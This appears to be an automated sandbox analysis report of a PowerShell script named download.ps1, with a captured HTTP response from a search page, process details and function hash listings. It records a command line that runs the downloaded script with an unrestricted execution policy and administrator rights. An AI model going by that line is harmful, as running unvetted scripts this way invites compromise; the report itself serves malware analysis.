                                                                                                                Data Ascii: 576e<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google has many special fe
                                                                                                                Jan 13, 2025 14:42:40.328566074 CET1289INData Raw: 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61
                                                                                                                Data Ascii: atures to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard_c
                                                                                                                Jan 13, 2025 14:42:40.328722000 CET1289INData Raw: 2c 34 30 30 2c 38 2c 32 31 36 2c 31 31 2c 34 39 32 2c 34 34 36 2c 31 2c 36 2c 32 37 39 2c 33 2c 31 30 30 2c 34 36 34 2c 35 37 36 2c 31 35 31 2c 32 37 35 2c 32 2c 38 35 2c 35 30 2c 36 33 35 2c 32 2c 33 38 32 2c 32 2c 32 35 31 2c 33 32 33 2c 38 31
                                                                                                                Data Ascii: ,400,8,216,11,492,446,1,6,279,3,100,464,576,151,275,2,85,50,635,2,382,2,251,323,819,142,257,195,2,7,1,141,54,8,20,392,229,455,269,564,258,314,1678,1515,538,193,6,922,1739,1606,169,3,410,646,47,22,6,2,885,2,4,4,4,4,183,5,613,88,647,7,1022,333,1
                                                                                                                Jan 13, 2025 14:42:40.328831911 CET1289INData Raw: 28 62 2b 65 2b 63 29 7d 3b 6c 3d 67 6f 6f 67 6c 65 2e 6b 45 49 3b 67 6f 6f 67 6c 65 2e 67 65 74 45 49 3d 6e 3b 67 6f 6f 67 6c 65 2e 67 65 74 4c 45 49 3d 70 3b 67 6f 6f 67 6c 65 2e 6d 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e
                                                                                                                Data Ascii: (b+e+c)};l=google.kEI;google.getEI=n;google.getLEI=p;google.ml=function(){return null};google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){d
                                                                                                                Jan 13, 2025 14:42:40.328950882 CET1289INData Raw: 61 72 20 61 3b 61 3a 7b 66 6f 72 28 61 3d 62 2e 74 61 72 67 65 74 3b 61 26 26 61 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 61 3d 61 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 69 66 28 61 2e 74 61 67 4e
                                                                                                                Data Ascii: ar a;a:{for(a=b.target;a&&a!==document.documentElement;a=a.parentElement)if(a.tagName==="A"){a=a.getAttribute("data-nohref")==="1";break a}a=!1}a&&b.preventDefault()},!0);}).call(this);</script><style>#gb{font:13px/27px Arial,sans-serif;height
                                                                                                                Jan 13, 2025 14:42:40.328990936 CET1289INData Raw: 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 7d 2e 67 62 72 74 6c 20 2e 67 62 6d 7b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 31 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e
                                                                                                                Data Ascii: adow:0 2px 4px rgba(0,0,0,.2)}.gbrtl .gbm{-moz-box-shadow:1px 1px 1px rgba(0,0,0,.2)}.gbto .gbm,.gbto #gbs{top:29px;visibility:visible}#gbz .gbm{left:0}#gbg .gbm{right:0}.gbxms{background-color:#ccc;display:block;position:absolute;z-index:1;to
                                                                                                                Jan 13, 2025 14:42:40.329190016 CET1289INData Raw: 61 79 3a 62 6c 6f 63 6b 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 73 70 61 6e 23 67 62 67 36 2c 73 70 61 6e 23 67 62 67 34 7b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 7d 2e 67 62 74 73 7b
                                                                                                                Data Ascii: ay:block;text-decoration:none !important}span#gbg6,span#gbg4{cursor:default}.gbts{border-left:1px solid transparent;border-right:1px solid transparent;display:block;*display:inline-block;padding:0 5px;position:relative;z-index:1000}.gbts{*disp
                                                                                                                Jan 13, 2025 14:42:40.329220057 CET1289INData Raw: 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 7d 2e 67 62 67 34 61 20 2e 67 62 74 73 7b 70 61 64 64 69 6e 67 3a 32 37 70 78 20 35 70 78 20 30 3b 2a 70 61 64 64 69 6e 67 3a 32 35 70 78 20 35 70 78 20 30 7d 2e 67 62 74 6f 20 2e 67 62 67 34 61 20 2e 67 62
                                                                                                                Data Ascii: line-height:0}.gbg4a .gbts{padding:27px 5px 0;*padding:25px 5px 0}.gbto .gbg4a .gbts{padding:29px 5px 1px;*padding:27px 5px 1px}#gbi4i,#gbi4id{left:5px;border:0;height:24px;position:absolute;top:1px;width:24px}.gbto #gbi4i,.gbto #gbi4id{top:3p
                                                                                                                Jan 13, 2025 14:42:40.329382896 CET1289INData Raw: 62 6d 6c 31 3a 76 69 73 69 74 65 64 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e 67 62 6d 6c 31 2c 2e 67 62 6d 6c 31 3a 76 69 73 69 74 65 64 7b 70 61 64 64 69 6e 67 3a 30 20 31 30 70 78 7d 2e
                                                                                                                Data Ascii: bml1:visited,.gbmlb:visited{*display:inline}.gbml1,.gbml1:visited{padding:0 10px}.gbml1-hvr,.gbml1:focus{outline:none;text-decoration:underline !important}#gbpm .gbml1{display:inline;margin:0;padding:0;white-space:nowrap}.gbmlb,.gbmlb:visited{
                                                                                                                Jan 13, 2025 14:42:40.329524040 CET1289INData Raw: 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 7d 23 67 62 64 34 20 2e 67 62 70 63 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 31 36 70 78 20 30 20 31 30 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35
                                                                                                                Data Ascii: solid #bebebe}#gbd4 .gbpc{display:inline-block;margin:16px 0 10px;padding-right:50px;vertical-align:top}#gbd4 .gbpc{*display:inline}.gbpc .gbps,.gbpc .gbps2{display:block;margin:0 20px}#gbmplp.gbps{margin:0 10px}.gbpc .gbps{color:#000;font-we
                                                                                                                Jan 13, 2025 14:42:40.434576988 CET1289INData Raw: 61 61 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 67 62 6d 70 69 61 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 34 38 70 78 3b 77 69 64
                                                                                                                Data Ascii: aa{display:block;margin-top:10px}.gbmpia{border:none;display:block;height:48px;width:48px}.gbmpnw{display:inline-block;height:auto;margin:10px 0;vertical-align:top}.gbqfb,.gbqfba,.gbqfbb{-moz-border-radius:2px;-webkit-border-radius:2px;border


                                                                                                                020406080s020406080100

                                                                                                                Click to jump to process

                                                                                                                020406080s0.0050100150MB

                                                                                                                Click to jump to process

                                                                                                                • File
                                                                                                                • Registry

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Click to jump to process

                                                                                                                Target ID:0
                                                                                                                Start time:08:42:19
                                                                                                                Start date:13/01/2025
                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                                                                Imagebase:0x7ff722890000
                                                                                                                File size:452'608 bytes
                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true
                                                                                                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                                                Target ID:1
                                                                                                                Start time:08:42:20
                                                                                                                Start date:13/01/2025
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff67ebf0000
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Executed Functions

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.35031452045.00007FF9862F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9862F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9862f0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ecfd678e36a442dcdb2f2c58cf5f7804f70a6f302a12adcf436abdb583eb3943
                                                                                                                • Instruction ID: 1a5e4a653d8f085fe4c34df07dccd4a4c67766ecb73e7564cfd4f46062cb67cb
                                                                                                                • Opcode Fuzzy Hash: ecfd678e36a442dcdb2f2c58cf5f7804f70a6f302a12adcf436abdb583eb3943
                                                                                                                • Instruction Fuzzy Hash: 02D17170918A4D8FEBA8DF28C8557ED77E1FB68300F54426ED81EC7291CB74A945CB82
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.35031452045.00007FF9862F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9862F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9862f0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1c53ca825738a7d286c497a184907d3d5d3d3c8a570dc74e1c85c1ba593a453f
                                                                                                                • Instruction ID: 84cdf90fb303f20b8ba20f7e961c11b2fd8e7c2c0a9cdbefc188120a1f5fe2c4
                                                                                                                • Opcode Fuzzy Hash: 1c53ca825738a7d286c497a184907d3d5d3d3c8a570dc74e1c85c1ba593a453f
                                                                                                                • Instruction Fuzzy Hash: 5AD17170A18A4D8FEFA8DF28C8557ED77D1FB58310F54822ED85DCB291CE74A9448B82
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.35031452045.00007FF9862F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9862F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9862f0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: P^F$`\F$^F
                                                                                                                • API String ID: 0-3129290892
                                                                                                                • Opcode ID: b3e47f98c35cb7d22a669e2c9074822babe7b6483f7608884979bfa12489c945
                                                                                                                • Instruction ID: c293afe25828364b4c7e317ddf107dd887c187805d02365e413df03583da156e
                                                                                                                • Opcode Fuzzy Hash: b3e47f98c35cb7d22a669e2c9074822babe7b6483f7608884979bfa12489c945
                                                                                                                • Instruction Fuzzy Hash: 2D51167190CA888FD71ACB9898066BA7BE0FB55720F5401BFD08DC7193CAA4BC19C787
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.35031452045.00007FF9862F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9862F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9862f0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: +K_^$^F
                                                                                                                • API String ID: 0-3997333795
                                                                                                                • Opcode ID: 2caf4f59061d8351646bf0fecfa26a965deed960672c547101353ad22c05a5d9
                                                                                                                • Instruction ID: aeb0e2d292db3daf4853ee91442441cb882c89ba4bec2fbdf95f6c1f90139bec
                                                                                                                • Opcode Fuzzy Hash: 2caf4f59061d8351646bf0fecfa26a965deed960672c547101353ad22c05a5d9
                                                                                                                • Instruction Fuzzy Hash: E891F36290D6C68FE716DBAC68652E97FA1FF52324F4801BBC098CB183D9947819C793
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.35031452045.00007FF9862F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9862F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9862f0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f664a4e52cdbf1195a0df5aba31a2e39e1e73214b2281b42c69a042826d2108c
                                                                                                                • Instruction ID: 69f09d5de8863b0bcc8e6425e85ff206ccd6c87e3a11ea6254f9319107480ef1
                                                                                                                • Opcode Fuzzy Hash: f664a4e52cdbf1195a0df5aba31a2e39e1e73214b2281b42c69a042826d2108c
                                                                                                                • Instruction Fuzzy Hash: 42915F70618A4D8FEFA8DF28D4557E937E1FF58300F54422AE85DC7291CE74A985CB82
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.35031452045.00007FF9862F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9862F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9862f0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 28018fd4ff3275e6e7c58edb109b72f3f58b2d93b3231ac13ee30ede25279e32
                                                                                                                • Instruction ID: 72909a8c86db534344f0ce99e9372ddefb3e54d3e57f4439e40c3ea8d1bd6269
                                                                                                                • Opcode Fuzzy Hash: 28018fd4ff3275e6e7c58edb109b72f3f58b2d93b3231ac13ee30ede25279e32
                                                                                                                • Instruction Fuzzy Hash: EE51267290CAC98FD716DB6C985A6E97FA0FF56320F0401ABD098CB183DA607C59C783
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.35031452045.00007FF9862F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9862F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9862f0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cc0133133856db412f85b0155313dbc6a0fa06c50b1ff50bd11ee6a3c0f69a12
                                                                                                                • Instruction ID: ab5ed135225d09667b9553f02aba5fb31f8e590962d2c568930245218589df94
                                                                                                                • Opcode Fuzzy Hash: cc0133133856db412f85b0155313dbc6a0fa06c50b1ff50bd11ee6a3c0f69a12
                                                                                                                • Instruction Fuzzy Hash: 9221283190CB4C4FDB59DFAC9C4A7E97BE0EB96320F04426FD048C7152DA74A81ACB92
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.35031452045.00007FF9862F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9862F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9862f0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cc1b82e091e6b5af0d3ea3f00c148593d7a773d941ad8e4df923344245db5817
                                                                                                                • Instruction ID: 94a791719f38194b4a1f700647fb80073b03ae6f3b584d58447b975bb1b26c1a
                                                                                                                • Opcode Fuzzy Hash: cc1b82e091e6b5af0d3ea3f00c148593d7a773d941ad8e4df923344245db5817
                                                                                                                • Instruction Fuzzy Hash: 2B310D7081854E8EFBB4DF18CC06BF932A0FF55315F90013AD51DCA192DAB9BE49CA12
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.35030386345.00007FF9861DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9861DD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9861dd000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 72cf00af18adb52640cc861cce60e261b51ceee4c0257a99186e753114b61bb4
                                                                                                                • Instruction ID: c2a9ddf4b9949849a22db573bcd9aa8f38e701d1b03cc94dbd5bbd532ebe482d
                                                                                                                • Opcode Fuzzy Hash: 72cf00af18adb52640cc861cce60e261b51ceee4c0257a99186e753114b61bb4
                                                                                                                • Instruction Fuzzy Hash: EF014F3150CE088F9BA4EF1EF48595237E0FB98320710065AD41DC755AD631F891CBC1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.35031452045.00007FF9862F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9862F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9862f0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0cfaf2aa9b4986932304b6877891c16bc235902bda6883cdd97758246e01d02b
                                                                                                                • Instruction ID: 086de57cd04c88550daa0b793caafdd0d96347b5ba0832801506d13492d94c5d
                                                                                                                • Opcode Fuzzy Hash: 0cfaf2aa9b4986932304b6877891c16bc235902bda6883cdd97758246e01d02b
                                                                                                                • Instruction Fuzzy Hash: AC01447111CB0C4FD744EF0CE451AA5B7E0FB95324F50056DE58AC3655D626F892CB46
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.35036601134.00007FF986540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF986540000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff986540000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 01843ee2d457a87e8b5666aa768c0af9d45ff603294e675c70e01febef1a7427
                                                                                                                • Instruction ID: 232a062db7ff2355d72ae28927671fc5df5390e5c67108b1ba2d34c030ca316f
                                                                                                                • Opcode Fuzzy Hash: 01843ee2d457a87e8b5666aa768c0af9d45ff603294e675c70e01febef1a7427
                                                                                                                • Instruction Fuzzy Hash: DEF0BE73A4C5488FEB58EB0CE451AA873E0FF45320B1400F6E15CCB563CA26BC01CB81
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.35031452045.00007FF9862F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9862F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9862f0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7ede483d35c91e8276513311f00b565039551cc1ea92d1aab838e5cc936006e9
                                                                                                                • Instruction ID: 3032f1a59a4e906c2ccfbc2ec54592523161f98956c56132d49406b8941ead9c
                                                                                                                • Opcode Fuzzy Hash: 7ede483d35c91e8276513311f00b565039551cc1ea92d1aab838e5cc936006e9
                                                                                                                • Instruction Fuzzy Hash: 07F0213180C6C98FDB06DF2888555D57FE0FF26210B0402D7D459CB0A1DB759858CBD3

                                                                                                                Non-executed Functions

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.35031452045.00007FF9862F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9862F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9862f0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: I$_$aK_I$aK_I$bK_I$bK_I$cK_I$dK_I
                                                                                                                • API String ID: 0-2115310095
                                                                                                                • Opcode ID: 9454a0dab1efa1963b3da7fe426a112d5fe27d2cf2a9260522010c71f4fa14f0
                                                                                                                • Instruction ID: 151d8d5b7af80ed9d746586211daf814a5432493b6c13a5ad622491c7283ace7
                                                                                                                • Opcode Fuzzy Hash: 9454a0dab1efa1963b3da7fe426a112d5fe27d2cf2a9260522010c71f4fa14f0
                                                                                                                • Instruction Fuzzy Hash: B992C593D0E5C11BF3A2CF6C38952A86F91FF91620B5842FBD0C4CE19BE858AD46C395
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.35031452045.00007FF9862F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9862F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9862f0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: I$_$aK_I$aK_I$bK_I$bK_I$cK_I$dK_I
                                                                                                                • API String ID: 0-2115310095
                                                                                                                • Opcode ID: c8cda7431ea34066b10b545ede5b756c3cf660f8e72590bbe43f4bcd8bf8b586
                                                                                                                • Instruction ID: 89fba6e42caa95890f27fb90b16c03b739f412a8131935323e3a91a3c9179171
                                                                                                                • Opcode Fuzzy Hash: c8cda7431ea34066b10b545ede5b756c3cf660f8e72590bbe43f4bcd8bf8b586
                                                                                                                • Instruction Fuzzy Hash: BD82B493D0E9C11BF3A2CF6C78952A86F91FF91620B5842FBD0C4CE19BE854AD46C395
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.35031452045.00007FF9862F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9862F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff9862f0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (0G$8,G$P/G$p0G$-G$/G
                                                                                                                • API String ID: 0-2355395984
                                                                                                                • Opcode ID: 49c52687036eb5979a2ce8e1b33579b691ad95edd03ecfdca385036d748f9bf6
                                                                                                                • Instruction ID: 5ee18dd11ce07ad0b7092749d5703e2dfadef706d72322cc48df34913eafeecf
                                                                                                                • Opcode Fuzzy Hash: 49c52687036eb5979a2ce8e1b33579b691ad95edd03ecfdca385036d748f9bf6
                                                                                                                • Instruction Fuzzy Hash: A451B693D0E9C25FF326CA5C18282A56F51FF92760B5841FBD098CB1D7D8D8AC19C359